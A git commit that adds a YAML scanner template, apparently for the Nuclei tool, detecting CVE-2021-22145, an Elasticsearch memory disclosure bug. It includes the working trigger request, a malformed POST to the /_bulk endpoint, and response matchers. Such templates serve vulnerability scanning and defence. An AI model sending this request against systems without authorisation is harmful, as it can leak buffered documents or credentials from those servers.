Added CVE-2021-22145

Co-Authored-By: Dhiyaneshwaran <leedhiyanesh@gmail.com>
2021-09-02 22:07:29 +05:30 · 2021-09-02 22:07:29 +05:30 · c2048eb6b5
parent a54057007e
commit c2048eb6b5
1 changed files with 36 additions and 0 deletions
--- a/cves/2021/CVE-2021-22145.yaml
+++ b/cves/2021/CVE-2021-22145.yaml
@ -0,0 +1,36 @@
+id: CVE-2021-22145
+
+info:
+  name: ElasticSearch 7.13.3 - Memory disclosure
+  author: dhiyaneshDk
+  severity: medium
+  description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.
+  reference:
+    - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-22145
+    - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html
+  tags: cve,cve2021,elascticsearch
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/_bulk'
+    headers:
+      Content-Type: application/json
+    body: |
+      @
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - 'root_cause'
+          - 'truncated'
+          - 'reason'
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 400